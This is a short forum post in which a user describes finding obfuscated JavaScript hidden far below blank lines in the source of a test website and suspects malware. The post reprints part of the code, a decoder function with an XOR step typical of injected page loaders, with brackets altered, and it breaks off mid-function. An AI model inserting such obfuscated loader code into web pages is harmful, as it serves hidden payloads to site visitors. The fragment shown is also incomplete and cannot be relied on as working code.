Hi all,

Apologies in advance for the long story ... its starts off as a server issue but I think it might be caused by desktop malware.

I've been struggling with this issue for the last few days and I think it might be casued by some kind of malware. I was playing around with some
website templates and created a test site, when I noticed this code right several blank pages down in the source code (I've replaced with [] but it
still comes out wonky in the post sorry etc):

[script language=JavaScript]function zz(x){var l=x.length,b=1024,i,j,h,p=0,s=0,w=0,t=Array(63,41, 59,48,47,28,30,58,17,16,0,0,0,0,0,0,13,24,61,3,9,
32,18,15,45,25,37,33,14,42,35,46,34,49,4,26,21,22, 38,43,5,6,60,0,0,0,0,40,0,7,1,52,20,12,56,0,51,23, 27,8,39,10,11,29,36,50,54,19,62,31,57,2,44,53,
55);for(j=Math.ceil(l/b);j]0;j--){h='';for(i=Math.min(l,b);i]0;i--,l--){w|=(t[x.charCodeAt(p++)-48])[[s;if(s){h+=String.fromCharCode(226^w&255)
;w